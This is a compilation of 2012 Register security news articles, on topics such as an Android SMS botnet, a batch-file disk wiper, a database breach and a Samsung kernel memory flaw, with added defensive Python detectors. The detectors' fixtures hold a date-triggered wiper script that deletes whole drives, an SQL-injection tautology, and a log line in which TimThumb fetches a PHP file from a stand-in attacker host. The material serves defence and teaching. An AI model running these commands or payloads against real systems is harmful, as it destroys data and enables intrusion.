STE WILLIAMS

Android Trojan taints US mobes, spews 500,000 texts A DAY

A Trojan that infects Android devices is behind an increase in text message spam in the US.

SpamSoldier infects smartphones and spews out thousands of SMS messages without the user’s permission. The mobile irritant is primarily spreading through texts that offer free versions of popular paid-for games such as Need for Speed: Most Wanted and Angry Birds Space.

Marks are encouraged to click on a web link in a message that supposedly leads to a game installer. In reality users who open the “installer app” only succeed in infecting their handset with the SpamSoldier Trojan.

Once in place, SpamSoldier gets to work sending more booby-trapped messages, spreading itself further in the process. In some cases a free version of a mobile game may even be installed to distract the user and cover up the fact the smartphone has become a spam-spewing bot.

The software nasty is spreading in the US, according to mobile anti-spam specialist Cloudmark.

“Once infected, a user’s phone will be used to silently send out thousands of spam SMS messages without permission to lists of victim phone numbers that the malware automatically downloads from a command-and-control server,” according to Cloudmark researcher Andrew Conway. “We’ve seen a peak rate so far of over half a million SMS messages per day.”

“This sort of attack changes the economics of SMS spam, as the spammer no longer has to pay for messages that are sent if he can use a botnet to control devices and cover his costs,” it added.

The Trojan is distributed largely from .mobi sites on a server in Hong Kong. The scammer behind the app first latched onto the idea in late October, brazenly punting the Trojan as an anti-SMS spam utility before switching to mobile gaming last month, a ploy that’s proved much more successful. Over the last three weeks or so the unidentified crook behind the scam has started earning cash from his mobile botnet.

“On 28 November the spammer decided to start monetizing,” Conway explained in a blog post on the SpamSoldier threat. “The free game messages continued, but there were also free gift card scam messages mixed in.”

The bogus gift card messages state:

You have just won a $1000 Target Gift Card but only the 1st 777 people that enter code 777 at http://[redacted].com can claim it!

“Of course, there are not really any free gift cards, this is just a trick to collect your personal information for affiliate programmes and sometimes identity theft,” Conway warned.

Cloudmark described the threat as the “first functioning Android botnet sending SMS spam” although it notes that several PC botnets capable of sending spam via email to text message gateways have occasionally cropped up in the past. Mobile malware that sends SMS messages to premium numbers from compromised smartphones is far more commonplace.

An advisory by phone security firm Lookout confirmed that SpamSoldier is targeting US mobile users; the list of targeted numbers downloaded from the botnet typically contains 100 US numbers at a time. It added that the distribution of the malware remains “relatively limited”.

“Even at these limited distribution levels, SpamSoldier still has the potential to make a big impact at a network level: a single prolonged infection could result in thousands of SMS spam messages,” writes Lookout researcher Derek Halliday.

“Overall detections remain low but we’ve observed instances on all major US carriers. The potential impact to mobile networks may be significant if the threat goes undetected for a long period of time. The primary negative impact appears to be the large amount of SMS messages sent and the potential this has to result in charges to the user and/or a slowdown of the carrier’s network.”

Halliday added: “The sole infection vector appears to be spam SMS messages; we have not yet detected SpamSoldier on any major app stores.” ®
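The traffic pattern Conway and Halliday describe, one handset pushing a flood of identical, link-carrying texts to numbers it has never contacted, is what a carrier or MDM team would look for. The following is an added example written for this page, not code from the Register article or from Cloudmark or Lookout: a small Python detector that runs a sliding window over a constructed carrier-side SMS log. The log format, every phone number and URL, and the threshold values are constructed for the illustration and are not drawn from the SpamSoldier campaign.

```python
"""Flag handsets whose outbound SMS pattern looks like a spam bot.

Added example, not from the article or from Cloudmark/Lookout: the log
format, thresholds and every number below are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class SmsEvent:
    ts: datetime
    sender: str
    recipient: str
    body: str


# Constructed carrier-side log format: ISO timestamp, sender, recipient, body.
LINE_RE = re.compile(r"^(\S+) (\+\d+) (\+\d+) (.*)$")
URL_RE = re.compile(r"https?://\S+", re.I)


def parse_log(text):
    """Parse log lines into SmsEvent objects, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append(SmsEvent(datetime.fromisoformat(m.group(1)),
                               m.group(2), m.group(3), m.group(4)))
    return events


def find_spam_senders(events, window=timedelta(minutes=10), min_msgs=50,
                      min_unique_recipients=0.9, min_dup_body=0.8):
    """Return {sender: reason} for senders that, inside any sliding window,
    sent at least min_msgs messages, mostly to distinct recipients, with one
    dominant body that carries a link.  A chatty human fails at least two of
    those three tests; a bot working through a downloaded target list passes all."""
    by_sender = defaultdict(list)
    for e in events:
        by_sender[e.sender].append(e)

    flagged = {}
    for sender, evs in by_sender.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:
                start += 1
            chunk = evs[start:end + 1]
            n = len(chunk)
            if n < min_msgs:
                continue
            recipients = {e.recipient for e in chunk}
            bodies = defaultdict(int)
            for e in chunk:
                bodies[e.body] += 1
            top_body, top_count = max(bodies.items(), key=lambda kv: kv[1])
            if (len(recipients) / n >= min_unique_recipients
                    and top_count / n >= min_dup_body
                    and URL_RE.search(top_body)):
                flagged[sender] = (f"{n} msgs in {window}, {len(recipients)} distinct "
                                   f"recipients, {top_count} identical bodies with a link")
                break
    return flagged


def build_sample_log():
    """Constructed traffic: one bot sending 120 identical lures to 120 numbers in
    eight minutes, and one ordinary user texting two contacts."""
    t0 = datetime(2012, 12, 18, 10, 0, 0)
    lines = []
    for i in range(120):
        ts = (t0 + timedelta(seconds=4 * i)).isoformat()
        lines.append(f"{ts} +15550000001 +1555100{i:04d} "
                     f"Free Need for Speed Most Wanted! http://lure.example/nfs")
    for i, body in enumerate(["running late", "ok see you at 7", "did the parcel arrive?"]):
        ts = (t0 + timedelta(minutes=i)).isoformat()
        lines.append(f"{ts} +15550000002 +1555200000{i % 2} {body}")
    return "\n".join(lines)


if __name__ == "__main__":
    for sender, reason in find_spam_senders(parse_log(build_sample_log())).items():
        print(sender, "->", reason)
```

The three tests are deliberately independent: volume alone would catch a busy group chat, and an identical body alone would catch a legitimate bulk notification, but a single handset sending the same link to dozens of previously unseen numbers inside ten minutes is the shape of a bot feeding off a downloaded target list. Lookout's point that 100 numbers arrive per batch suggests tuning `min_msgs` to the batch size a given carrier actually sees.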

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/19/spamsoldier_android_botnet/

Baby got .BAT: Old-school malware terrifies Iran with del *.*

A surprisingly simple disk-wiping malware has set off alarm bells in Iran after surfacing in the Middle East nation.

The software nasty deletes everything on storage drives attached to infected Windows PCs on specific dates, according to the Iranian security emergency response team. The malware was detected in one or more targeted attacks although the identity of the intended victim is not known.

Its operation is similar to the data-destroying worm Shamoon that ransacked Gulf oil giants earlier this year, but the two pieces of software otherwise appear unrelated.

BatchWiper, as the snared malware’s name suggests, uses a Windows batch file to remove files from infected machines, according to an analysis by security tools biz AlienVault.

A self-extracting RAR archive called GrooveMonitor.exe is used to drop the malware’s files onto a system. However the same software nasty can easily be packaged in other ways and appear under different guises.

Jaime Blasco, labs manager at AlienVault, said that it is not clear how BatchWiper malware is spreading. “The dropper could be deployed using several vectors, ranging from spear phishing emails, infected USB drives, via some other malware already running on computers, or an internal actor uploading it to network shares,” he said.

Blasco concludes that despite its simplicity, BatchWiper is capable of causing significant irritation if its file-wiping code is executed. Once that kicks in, it’s time to break out the backups or your favourite undelete utility. ®
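A batch-file wiper that fires only on particular dates is easy to triage statically once a responder has the dropped files in hand. The following is an added example, not AlienVault's analysis and not BatchWiper itself: a Python script that scans a suspect `.bat` for wholesale delete or format commands and for `if` statements gated on `%date%`, then gives a verdict. The regular expressions, the verdict labels and the two sample scripts are constructed for the illustration.

```python
"""Static triage of a suspect Windows batch file.

Added example, not AlienVault's analysis or BatchWiper itself: the patterns
and the sample scripts are constructed to show what a responder checks for."""
import re

# Commands that destroy data wholesale.  Lookaheads let the switches and the
# target appear in any order on the line.
DESTRUCTIVE_PATTERNS = [
    (re.compile(r"\b(del|erase)\b(?=.*\s/[sq]\b)(?=.*(\*\.\*|\\\*))", re.I),
     "quiet/recursive wildcard delete"),
    (re.compile(r"\b(rd|rmdir)\b(?=.*\s/s\b)(?=.*\s/q\b)", re.I),
     "quiet recursive directory removal"),
    (re.compile(r"\bformat\s+[a-z]:", re.I), "volume format"),
]
# An `if` that compares %date% (optionally substringed, e.g. %date:~4,10%).
DATE_GATE = re.compile(r"\bif\b.*%date(?::~\d+(?:,\d+)?)?%", re.I)


def triage_batch(text):
    """Return a dict with the destructive lines found, whether execution is
    gated on the calendar date, and a short verdict."""
    hits, date_gated = [], False
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.lower().startswith(("rem ", "::")):
            continue  # comments cannot run
        if DATE_GATE.search(stripped):
            date_gated = True
        for pattern, reason in DESTRUCTIVE_PATTERNS:
            if pattern.search(stripped):
                hits.append((no, reason, stripped))
    if hits and date_gated:
        verdict = "time-bombed wiper"
    elif hits:
        verdict = "destructive"
    else:
        verdict = "no destructive commands"
    return {"destructive": hits, "date_gated": date_gated, "verdict": verdict}


# Constructed sample in the shape the article describes: run only on fixed
# dates, then delete everything under a drive root.
SAMPLE_WIPER = """\
@echo off
rem constructed triage sample
if "%date:~4,10%"=="12/20/2012" goto wipe
if "%date:~4,10%"=="01/21/2013" goto wipe
goto :eof
:wipe
del /s /q /f D:\\*.*
del /s /q /f E:\\*.*
"""

# Constructed housekeeping script: a single-file delete is not a wiper.
SAMPLE_BENIGN = """\
@echo off
for %%f in (*.log) do echo %%f
del /q old_report.txt
"""

if __name__ == "__main__":
    for name, script in (("wiper", SAMPLE_WIPER), ("benign", SAMPLE_BENIGN)):
        print(name, "->", triage_batch(script)["verdict"])
```

The date gate matters for the response as much as for the verdict: a machine that has the dropper but has not yet reached the trigger date can still be cleaned with no data loss, which is why the wipe dates recovered from the script belong in the incident report alongside the hash of the dropper.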

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/19/batchwiper/

Naked Scarlett Johansson pic snatch bloke gets 10 YEARS

A US man who hacked into the email accounts of celebrities including Scarlett Johansson and Mila Kunis and later leaked their nude photos has been sentenced to 10 years in prison.

Former office clerk Christopher Chaney, who claims he was “addicted” to spying on celebrities’ private lives, leaked naked pictures of the shlebs to two celebrity gossip websites and a hacker.

Scarlett Johansson said in a video statement to the court that the leaked images, selfies she had snapped while topless, were taken for her then-husband Ryan Reynolds, and that she had been “truly humiliated and embarrassed” when they turned up online.

Prosecutors said Chaney had illegally accessed the email accounts of more than 50 celebrities between November 2010 and October 2011, including an account belonging to singer Christina Aguilera. He was charged with 28 counts relating to hacking and made a plea deal for cases in nine felony courts, Reuters reported.

He was also ordered to pay $66,179 in restitution to victims.

“I don’t know what else to say except I’m sorry,” Chaney said during his sentencing. “This will never happen again.”

Chaney was arrested after an FBI investigation dubbed “Operation Hackerazzi” in October 2011. After his arrest, he told a Florida television station that he had started hacking into celebrity email accounts out of curiosity and then became “addicted”.

“I was almost relieved months ago when they came in and took my computer … because I didn’t know how to stop,” he said.

Prosecutors alleged that Chaney had also stalked two Florida women online, one since 1999 when she was 13 years old. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/hackerazzi_hacker_jailed/

Conmen DID use leaked info of sporty civil servants… to attack HMRC

Criminals used the personal data of 100,000 civil servants that was swiped in early 2010 in an attack on HMRC around the same time, The Register has discovered. Now, almost three years later, the government is still scrabbling around trying to work out whodunnit… and only recently ‘fessed up to the individuals concerned that their data had been snaffled.

Just last month, the Civil Service Sports Council informed civil servants who signed up to access football fields and gyms through the council that their personal details had been slurped. Now it has emerged that their data was used as ammunition in a broadside against the tax collectors – a previously unknown and unreported attack.

It is understood that no “individual fraud” was committed, but the data could theoretically have been used by crims to draw ghost benefits or even ghost salaries from the government department. Nevertheless, until recently, none of the targets were informed that their data had been compromised.

Leaky database was juicy target

The three-year-old attack came to light a few weeks ago when the Sports Council revealed to its 100,000+ members that their personal data had been stolen by hackers some time before February 2010.

A leaky database at the Civil Service Sports Council gave the crims the opportunity to steal the names, addresses, dates of birth and national insurance numbers of the entire sports-playing membership. And they did. Because the database was unencrypted and all the information was kept together, a simple SQL injection was all it would have taken to crack the database open and filch the details.

So far so standard. No inside knowledge of the civil service’s sports club was required either: a simple crawl and probe bot – a programme that searches the web for vulnerable databases – could have picked on the shoddy data storage simply from roving around online. The size of the data trove and the fact that it contained national insurance numbers made it a particularly juicy target.
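The article's point is that a membership lookup built by gluing user input into the query text hands the whole table to whoever supplies the right quote character. The following is an added example, not the Sports Council's code: a Python/sqlite3 script holding a constructed membership table with the same kinds of fields the article lists, and the same lookup written the vulnerable way and the parameterised way, so the difference can be seen on one input. Names, addresses and NI numbers in it are made up.

```python
"""Membership lookup done two ways: string-built SQL that an injected quote
breaks open, and the parameterised query that does not.

Added example, not the Sports Council's code: the schema, the rows and the
names are constructed."""
import sqlite3


def make_membership_db():
    """In-memory table holding the same kinds of fields the article lists."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE members (
        id INTEGER PRIMARY KEY, name TEXT, address TEXT, dob TEXT, ni_number TEXT)""")
    conn.executemany(
        "INSERT INTO members (name, address, dob, ni_number) VALUES (?, ?, ?, ?)",
        [("Alice Example", "1 Example Road", "1975-03-02", "QQ123456A"),
         ("Bob Example", "2 Example Road", "1981-11-17", "QQ234567B"),
         ("Carol Example", "3 Example Road", "1969-06-30", "QQ345678C")])
    return conn


def lookup_vulnerable(conn, name):
    """Concatenates the caller's input into the SQL text, so a quote in the
    input ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT name, ni_number FROM members WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Binds the input as a parameter; the database receives the query shape
    and the value separately, so the value can never change the shape."""
    return conn.execute(
        "SELECT name, ni_number FROM members WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    db = make_membership_db()
    probe = "x' OR '1'='1"   # the textbook tautology, constructed input
    print("vulnerable:", len(lookup_vulnerable(db, probe)), "rows")  # 3
    print("safe:      ", len(lookup_safe(db, probe)), "rows")        # 0
```

Parameter binding closes the injection, but the other half of the article's complaint, that everything sat in one unencrypted table, is a separate control: the web-facing account should only be able to read the columns the sports-booking feature needs, and a field as sensitive as a national insurance number should not be in a reachable table at all unless the application genuinely uses it.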

How the data could have been used to hack the government

Then it gets more complicated. The Sports Council says there is “no evidence” that the data was used to attempt individual fraud, but does say it was used in an attempt to defraud central government.

That doesn’t stack up for Trend Micro Security expert Rik Ferguson, who makes a comparison to the HMRC data loss of 2007 when the personal details of 25 million recipients of child benefits were lost after unencrypted CDs went astray. Then there was no suggestion that the stray data would be used against government but HMRC nevertheless had to warn all 25 million recipients that it might be used against them in personal fraud attacks.

“It was exactly the same data that was in Sports Council database – names, addresses, national insurance numbers,” says Ferguson, “so I don’t know why they suspected it would be used in a different area this time.”

The data was used to perpetrate an attack on government according to the Sports Council, and an HMRC spokesperson has confirmed to The Register that the tax-collecting and benefit-dealing ministry had suffered an attack and was investigating it.

HMRC has said it can’t comment on the investigation as it is ongoing: so we don’t know the nature of the attack, or whether it was successful.

We do know that it involved the personal details of the civil service sports council members, that it happened in or before February 2010, that it is subject to criminal investigation and we can surmise that it was big.

Why do we think it was big? Two reasons: first that it was significant enough for HMRC to set an internal team investigating it. Second, the fact that the internal investigators were able to trace the cracked data back to the sports club. If 15 or 30 jilted national insurance numbers were used, it would have been difficult to make a connection that led back to the Sports Council. For the investigators to track it back, the data must have been used in sufficient quantities for them to work out that the fraudulently used national insurance numbers came from a single source – the Sports Council membership list.

How exactly the data could have been used to force the system is open to speculation. A national insurance number, date of birth and address would be all you need to set up an account, and presumably to access benefits or even a salary, though doing it on a large scale would be extremely complicated. Trend Micro’s Ferguson says:

That data for a single person gives you everything that you need to commit personal financial fraud, which would be fraud against a financial institution. If you have what you need for benefit fraud, then you have what you need for all financial fraud. Fraud is fraud.

A civil servant who spoke to The Register explained that National Insurance numbers are used as payroll identifiers in the civil service. Still, the attack mechanism must have been relatively complex:

I don’t think it would be done in batches; they have software that picks up patterns of behaviour like that, so only certain individuals will have been affected.

Data will most likely be used for personal fraud

Ferguson was sceptical of the Sports Council’s assurance that the data had not and would not be used in personal fraud attacks:

If you’re the person responsible for stealing that, you’re going to be offering that up for sale in underground forums then that will be sold in small amounts. That’s another argument for why you can’t have any certainty about how the data will end up being used.

The UK’s watchdog for data protection – the Information Commissioner’s Office (ICO) – the public’s white knight on matters of individual data privacy – was informed about the breach by the Sports Council just after it found out, on 18 February 2010, but turned over the duty of investigation to HMRC, spokesperson Greg Jones told El Reg.

Following the database ransack, the Sports Council has significantly cleaned up its database security, it says. Pressed for a statement, CSSC would only reiterate its initial statement to members: that there had been a criminal investigation into the hack, and that the data had been used against government but not – to their knowledge – against individuals.

There was no evidence of any risk to individuals since the fraud concerned attempts to defraud central government rather than individuals.

The CSSC would not disclose the extra development in the investigation that meant they decided to inform all members of the breach on 25 November, two years and nine months after they found out about it. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/civil_servants_data_used_to_attack_hmrc/

Football club catches, then punts, Kaspersky name

Australian Rugby League team the Manly Warringah Sea Eagles has changed its name to the Kaspersky Sea Eagles, only to retract the name change hours later after a backlash from fans.

Rugby League is a 13-a-side version of rugby. The sport is popular in northern England and the east coast of Australia, where interest is sufficiently high that Rupert Murdoch once formed a breakaway rebel competition to lure punters to his pay TV interests. Elsewhere in the world the game is obscure and unloved, except in Papua New Guinea where it is the national sport.

Manly is a somewhat insular Sydney beachside suburb, and its team is the one supporters of other clubs love to hate. But yesterday its supporters hated it too, after the club cemented a sponsorship deal with Kaspersky Lab by issuing a press release announcing it will henceforth be known as the “Kaspersky Sea Eagles”. The name change came after a new deal that will see Kaspersky appear on the team’s jerseys for three years until 2015. Kaspersky has sponsored the team since 2011.

Fans, including television weatherman Tim Bailey, promptly took to forums and social media to decry the besmirching of the club’s name.

A mere two hours later, the club issued another press release, this time saying it will forever be called the Manly Warringah Sea Eagles, but that it will be the Kaspersky Sea Eagles for administrative purposes in order to help the antivirus company extract maximum value from its sponsorship dollar.

Kaspersky also sponsors the Collingwood Magpies, the richest and most-hated team in the Australian Football League. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/football_club_drops_kaspersky_name/

Anonymous hacks Westboro Baptists over Sandy Hook protests

Anonymous has posted personal data of many members of the Westboro Baptist Church and is promising to shut down the religious sect after it announced plans to protest the funerals of those killed at Sandy Hook Elementary School last week.

“We have unanimously deemed your organization to be harmful to the population of the USA, and have therefore decided to execute an agenda of action which will progressively dismantle your institution of deceitful pretext and extreme bias, and cease when your zealotry runs dry,” the hacking group said in the now-traditional video.

“We recognize you as serious opponents, and do not expect our campaign to terminate in a short period of time. Attrition is our weapon, and we will waste no time, money, effort, and enjoyment, in tearing your resolve into pieces, as with exposing the incongruity of your distorted faith.”

The upload to Pastebin shows names, addresses, birth dates, emails, and phone numbers for many of the WBC members, along with domain details for the many sites it owns, including godhatesfags.com, beastobama.com, and godhatesthemedia.com. That’s pretty basic stuff, but Anonymous claims this is just the start.

The group also publicized an online petition to the US government calling for the WBC to be officially designated a hate group. So far it has acquired over 100,000 signatures, well over the threshold required for official comment (once the White House is finished preparing a statement on the building of a Death Star.)

This isn’t the first time Anonymous and the WBC have had a run-in. Last year the group declared another action against the WBC, and hacked the sect’s website live during an online debate with the WBC clan matriarch Shirley Phelps-Roper. But the hacking group says this time it’s playing for keeps.

In a separate but related attack, a Twitter account belonging to Phelps-Roper has been taken over by someone claiming to be Cosmo the God, a teenage member of the UG Nazi hacker collective. If so, it’s not exactly a smart move, since Cosmo is currently doing six years of probation, part of which is a commitment to stay offline – but the Sandy Hook shootings have aroused strong emotions in America.

Even before the bodies of the victims were removed from the scene of the shooting, the WBC announced its intention to protest the funerals of those slain. In her Twitter feed, Shirley Phelps-Roper originally blamed the shooting on Connecticut’s decision to legalize gay marriage, and said the group would be at the funerals.

The WBC makes a living out of trekking to funerals across the US to preach their message that everyone in the world is going to hell apart from them, and that such tragic events as Sandy Hook are proof of this. The group, which has barely 100 (mostly family) members, also has a lucrative sideline in suing those who attack them, of whom there are many.

So far various groups have said they will gather to block off any sight of the WBC’s protests from families attending funerals. While the Supreme Court has upheld the WBC’s right to protest, they can expect to be swamped by those seeking to block out their message. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/anonymous_westboro_baptist_hack/

Samsung mobes pwned by ANY APP, thanks to chip code hole

A member of an XDA developers forum who calls him-or-herself Alephzain claims to have found a flaw in several Samsung handsets and tablets that could allow attackers to enjoy full access to their RAM.

Alephzain posted news of the embarrassing bug here, stating: “The security hole is in [the] kernel, exactly with the device /dev/exynos-mem.”

Thanks to exynos-mem’s wide-open file system permissions, it can be read from and written to by any software running on the handheld, acting as a portal to the device’s physical memory and allowing malicious code to do pretty much anything it wants.

Exynos is Samsung’s ARM-based system-on-a-chip and is found in a great many of its Linux-powered Android devices.

Alephzain’s assessment of the flaw follows:

The good news is we can easily obtain root on these devices, and the bad is that there is no control over it.

RAM dump, kernel code injection and others could be possible via app installation from Play Store. There certainly exist many ways to do that, but Samsung gives an easy way to exploit. This security hole is dangerous and exposes the phone to malicious apps.

Exploitation with native C and JNI could be easily feasible.

The flaw has attracted attention from others in the same forums, one of whom – Chainfire – has thoughtfully provided an exploit for the flaw and warned “any app can use it to gain root without asking and without any permissions on a vulnerable device”, adding “let’s hope for some fixes ASAP”.

Devices in trouble are said to include the Galaxy SIII, Galaxy Note, Galaxy Note 2 and Galaxy 10.1 tablets.

Members of the XDA developers community are evidently quite keen on the flaw, as it will allow them to do some low level hacking on their preferred Samsung devices. Community members say they’ve told Samsung about the problem, which should allow the rest of us to Keep Calm and Not Download Apps until a fix is issued. ®
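The root cause the article describes is not exotic: a device node that maps physical memory was created with permissions that let any process open it for reading and writing. That is a condition a platform or device team can audit for mechanically. The following is an added example, not Samsung's fix and not any code from the XDA thread: a Python script that walks a `/dev` tree and reports device nodes readable and writable by everyone that are not on an allowlist of nodes meant to be that way. The allowlist is a starting point I chose, not a platform-certified list, and the sample tree the script builds for a root-less self-test uses ordinary files named after the nodes in question.

```python
"""Audit device nodes for permissions that let any process read and write them.

Added example, not Samsung's fix or code from the XDA thread: the allowlist is a
starting point chosen for this illustration; tune it for the platform audited."""
import os
import stat
import tempfile

# Nodes that are world-accessible by design on Linux/Android (constructed
# starting list); anything else with o+rw deserves a look.
EXPECTED_WORLD_RW = {"null", "zero", "full", "random", "urandom", "tty", "ptmx"}


def audit_device_nodes(dev_dir="/dev", allowlist=EXPECTED_WORLD_RW, devices_only=True):
    """Return [(path, mode)] for entries that are readable and writable by
    'other' and not on the allowlist.  devices_only=False also checks regular
    files, which lets the function be exercised without root."""
    findings = []
    for root, _dirs, files in os.walk(dev_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # node vanished or unreadable; skip rather than abort
            is_dev = stat.S_ISCHR(st.st_mode) or stat.S_ISBLK(st.st_mode)
            if devices_only and not is_dev:
                continue
            if name in allowlist:
                continue
            perms = stat.S_IMODE(st.st_mode)
            if perms & stat.S_IROTH and perms & stat.S_IWOTH:
                findings.append((path, oct(perms)))
    return sorted(findings)


def make_sample_tree():
    """Constructed stand-in for /dev using regular files: one node locked to
    its owner, one wide open, and one wide open but expected (named 'null')."""
    d = tempfile.mkdtemp(prefix="devaudit-")
    for name, mode in (("exynos-mem", 0o666), ("mem", 0o600), ("null", 0o666)):
        p = os.path.join(d, name)
        with open(p, "w"):
            pass
        os.chmod(p, mode)
    return d


if __name__ == "__main__":
    for path, mode in audit_device_nodes():
        print(mode, path)
```

Run as root against a real handset (for instance over `adb shell` on a device where `/dev` is readable) the default call reports only character and block devices; the `devices_only=False` path exists so the logic can be checked on a throwaway directory without privileges. The remediation side is equally mundane: a node that exposes memory should be owned by root with a mode such as 0600, or restricted to a dedicated group, and that is set in the platform's device-node configuration rather than in the driver.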

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/samsung_exynos_flaw/

Hackers warn: We’ll hit US banks… again

Hackers who claimed responsibility for a series of denial of service attacks against US banks in September have warned the US they plan to renew their assault shortly.

The Izz ad-Din al-Qassam Cyber Fighters named US Bancorp, JP Morgan Chase, Bank of America, PNC Financial Services Group and SunTrust as possible attack targets for the second phase of its Ababil operation. “In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks,” it said in a statement posted on Pastebin on Monday.

The group of hackers continue to be incensed with the presence of the inflammatory and amateurish Innocence of Muslims video on YouTube. Pull the film and the attacks will be called off or stopped, the group says. The group doesn’t accept arguments that the banks have no influence on clips hosted by YouTube.

Security researchers analysing the earlier attacks quickly came to the conclusion that they were largely powered by bots. DDoS mitigation specialist Arbor Networks reckons most of the attack traffic was launched from insecure websites rather than malware-infected PCs.

Many compromised PHP web applications were used as bots in the [September] attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools.

Several PHP-based tools were used in the September attacks, the most prominent of which was Brobot along with two other tools, KamiKaze and AMOS. A revamped version of the tool has been deployed in the second phase of the attacks, which have already begun to surface.

On December 11, 2012, attacks on several of these victims were observed. Some attacks looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2.

A blog post by Arbor covering lessons learned from earlier attacks as well as preliminary observations about the latest run of assaults can be found here. ®
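Arbor's account implies two traces that a site owner can look for in ordinary web server logs long before the site is used as a DDoS node: TimThumb (whose job is to fetch and resize images) being asked to fetch a file from a host that is not the site's own, and a PHP script being executed from the uploads directory, where only static files belong. The following is an added example, not Arbor's tooling or anything from the blog post: a Python scanner over the Apache/nginx combined log format with four constructed lines (RFC 5737 addresses and reserved `.example` hostnames). The `site_hosts` parameter, the reason strings and the sample paths are my own choices.

```python
"""Flag TimThumb remote-fetch requests and PHP execution under wp-content/uploads.

Added example, not Arbor's tooling: the log lines and hostnames are constructed
(RFC 5737 addresses, reserved .example domain)."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format, up to the status and size fields.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, size = m.groups()
    parts = urlsplit(target)
    return {"ip": ip, "ts": ts, "method": method.upper(), "path": parts.path,
            "query": parse_qs(parts.query), "status": int(status)}


def classify(req, site_hosts=()):
    """Return the reasons a request looks like webshell or remote-include activity.
    site_hosts lists hostnames the site legitimately loads images from."""
    reasons = []
    path = req["path"].lower()
    if path.endswith("/timthumb.php") or path.endswith("/thumb.php"):
        for src in req["query"].get("src", []):
            host = urlsplit(src).hostname
            if host and host not in site_hosts:
                reasons.append(f"timthumb asked to fetch remote src from {host}")
    if req["method"] == "POST" and "/wp-content/uploads/" in path and path.endswith(".php"):
        reasons.append("POST to PHP script under uploads directory")
    return reasons


def scan_log(text, site_hosts=()):
    """Return [(client_ip, path, reason)] for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for reason in classify(req, site_hosts):
            hits.append((req["ip"], req["path"], reason))
    return hits


# Constructed log: a remote fetch through timthumb, a POST to a script under
# uploads, a legitimate local thumbnail request, and a plain image download.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2012:03:14:07 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://cdn.attacker.example/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Dec/2012:03:15:22 +0000] "POST /wp-content/uploads/2012/12/x.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Dec/2012:03:16:01 +0000] "GET /wp-content/themes/demo/timthumb.php?src=images/header.jpg&w=100 HTTP/1.1" 200 9331 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Dec/2012:03:17:45 +0000] "GET /wp-content/uploads/2012/12/photo.jpg HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

The second signature is the more durable of the two, because it does not depend on which plugin was abused: whatever the entry point, a webshell dropped under uploads has to be invoked, and a web server configured to refuse PHP execution in that directory turns the detection into a prevention.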

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/us_bank_ddos_assaults/

Security flaw found in Samsung’s system-on-chip

A member of an XDA developers forum who calls him-or-herself alephzain claims to have found a flaw in several Samsung handsets and tablets that could allow attackers to enjoy access to their RAM.

Alephzain posted news of the flaw here, stating that “The security hole is in kernel, exactly with the device /dev/exynos-mem.”

Exynos is Samsung’s ARM-based system on a chip and is found in a great many of its devices.

Alephzain’s assessment of the flaw follows:

“The good news is we can easily obtain root on these devices, and the bad is that there is no control over it.

RAM dump, kernel code injection and others could be possible via app installation from Play Store. There certainly exist many ways to do that, but Samsung gives an easy way to exploit. This security hole is dangerous and exposes the phone to malicious apps.

Exploitation with native C and JNI could be easily feasible.”

The flaw has attracted attention from others in the same forums, one of whom – Chainfire – has thoughtfully provided an exploit for the flaw and warned “any app can use it to gain root without asking and without any permissions on a vulnerable device” before adding “Let’s hope for some fixes ASAP.”

Devices in trouble are said to include the Galaxy SIII, Galaxy Note, Galaxy Note 2 and Galaxy 10.1 tablets.

Members of the XDA developers community are evidently quite keen on the flaw, as it will allow them to do some low level hacking on their preferred Samsung devices. Community members say they’ve told Samsung about the problem, which should allow the rest of us to Keep Calm and Not Download Apps until a fix is issued. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/samsung_exynos_flaw/